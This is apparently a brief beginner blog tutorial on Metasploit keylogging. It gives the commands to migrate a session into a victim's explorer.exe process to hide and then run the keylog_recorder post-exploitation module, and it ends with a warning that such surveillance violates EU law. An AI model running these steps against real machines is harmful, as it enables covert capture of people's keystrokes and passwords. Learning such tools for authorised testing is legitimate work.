Skip to content

METASPOILT – Beginners Guide – Tutorial on How to use keylogger commands


Keyloggers are not the most efficient tool, there are far more devastating attacks.  However keyloggers have their fan base.


(explorer.exe) 1668

migrate 1668

run post/windows/capture/keylog_recorder


saves to /root/.msf3/loot/

(on Backtrack)


Logic Flow

1. list running processes on victims machine

2. look for application with a GUI to hide you.

3. migrate to explorer process in memory – this means the attacker is “cloaked” as windows session space in memory

4. run keylogger – capture input

5. store to /root/.msf3/loot

ILLEGAL – Surveillance is against EU Employment law.

Only use these commands on your own equipment.

If you are an employer the EU demands that you must tell employees that they are under surveillance.  Not only will you violate EU Data Protection and therefore lose your case, I would expect you to be heavily fined in an Employment Tribunal.

Do not violate the PRIME DIRECTIVE of Data Protection.

Leave a Comment

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

%d bloggers like this: